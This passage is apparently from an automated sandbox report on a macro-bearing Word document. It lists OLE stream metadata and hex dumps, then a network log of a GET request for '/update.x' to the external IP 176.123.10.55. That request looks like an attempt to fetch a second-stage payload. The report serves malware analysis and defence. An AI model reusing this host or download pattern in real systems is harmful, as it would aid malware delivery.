Copyright Joe Security LLC 2017 Page 20 of 28 General Data ASCII: j ...... 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . Data Raw: 6a 04 0f 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
Stream Path: Data, File Type: data, Stream Size: 108224
General Stream Path: Data File Type: data Stream Size: 108224 Entropy: 7.96508540724 Base64 Encoded: True Data ASCII: . . . . D . d ...... > ...... \\ ...... C . . . 8 . . . . A ...... c . a . p . t . u . r . e . 1 . . - . . C . o . p . y ...... b ...... { . u . . , D B . . " > . v ...... D ...... n ...... { . u . . , D B . . " > . v . . . . P N G ...... I H D R . . . Data Raw: b2 e2 00 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 3e 13 0b f9 02 f9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 5c 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 38 00 00 00 04 41 01 00 00 00 05 c1 20 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 63 00 61 00
Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 409
General Stream Path: Macros/PROJECT File Type: ASCII text, with CRLF line terminators Stream Size: 409 Entropy: 5.33185196595 Base64 Encoded: True Data ASCII: I D = " { 8 2 8 5 F A 5 A - 7 7 C 1 - 4 0 7 7 - 8 D 1 2 - F C 3 D 1 A 2 6 A C 4 4 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 A 8 8 5 3 8 8 3 8 8 C 3 8 8 C 3 8 8 C 3 8 8 C " . . D P B = " 7 3 7 1 A A A 3 9 2 A 4 9 2 A 4 9 2 " . . G C = " 5 C 5 E 8 5 D E 8 7 C 6 8 8 C 6 8 8 3 9 " . . . . [ H o s t Data Raw: 49 44 3d 22 7b 38 32 38 35 46 41 35 41 2d 37 37 43 31 2d 34 30 37 37 2d 38 44 31 32 2d 46 43 33 44 31 41 32 36 41 43 34 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22
Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 65
General Stream Path: Macros/PROJECTwm File Type: data Stream Size: 65 Entropy: 3.27802992751 Base64 Encoded: False Data ASCII: T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . Data Raw: 54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5497
General Stream Path: Macros/VBA/_VBA_PROJECT File Type: data Stream Size: 5497 Entropy: 5.06905804277 Base64 Encoded: False Data ASCII: . a ...... * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Copyright Joe Security LLC 2017 Page 21 of 28 General Data Raw: cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 569
General Stream Path: Macros/VBA/dir File Type: data Stream Size: 569 Entropy: 6.35701706503 Base64 Encoded: True Data ASCII: . 5 ...... 0 * . . . . . p . . H . . . . . d ...... P r o j e c t . Q . ( . . @ . . . . . = . . . . . l ...... Q w Z . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C ...... 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F ...... * . \\ C . . . . . m . . . Data Raw: 01 35 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 09 51 77 5a 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
Stream Path: WordDocument, File Type: data, Stream Size: 4096
General Stream Path: WordDocument File Type: data Stream Size: 4096 Entropy: 1.05529472675 Base64 Encoded: False Data ASCII: . . . . _ ...... b j b j , E , E ...... 4 . . . N / . . N / ...... Data Raw: ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 03 08 00 00 0e 00 62 6a 62 6a 2c 45 2c 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 0e 00 00 4e 2f 00 00 4e 2f 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP Oct 23, 2017 21:47:18.591574907 CEST 49165 80 192.168.2.2 176.123.10.55 Oct 23, 2017 21:47:18.591598988 CEST 80 49165 176.123.10.55 192.168.2.2 Oct 23, 2017 21:47:18.591640949 CEST 49165 80 192.168.2.2 176.123.10.55 Oct 23, 2017 21:47:18.591969967 CEST 49165 80 192.168.2.2 176.123.10.55 Oct 23, 2017 21:47:18.591979027 CEST 80 49165 176.123.10.55 192.168.2.2 Oct 23, 2017 21:47:19.291038990 CEST 80 49165 176.123.10.55 192.168.2.2 Oct 23, 2017 21:47:19.291075945 CEST 80 49165 176.123.10.55 192.168.2.2 Oct 23, 2017 21:47:19.291152954 CEST 49165 80 192.168.2.2 176.123.10.55 Oct 23, 2017 21:47:19.296128035 CEST 49165 80 192.168.2.2 176.123.10.55 Oct 23, 2017 21:47:19.296144009 CEST 80 49165 176.123.10.55 192.168.2.2
HTTP Request Dependency Graph
176.123.10.55
HTTP Packets
Copyright Joe Security LLC 2017 Page 22 of 28 Total Bytes Source Dest Transfered Timestamp Port Port Source IP Dest IP Header (KB) Oct 23, 2017 21:47:18.591969967 CEST 49165 80 192.168.2.2 176.123.10.55 GET /update.x HTTP/1.1 0 Host: 176.123.10.55 Connection: Keep-Alive Oct 23, 2017 21:47:19.291038990 CEST 80 49165 176.123.10.55 192.168.2.2 HTTP/1.1 404 Not Found 0 Date: Mon, 23 Oct 2017 19:47:19 GMT Server: Apache Content-Length: 206 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 64 61 74 65 2e 78 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii:
Not Found
The requested URL /update.x was not found on this server.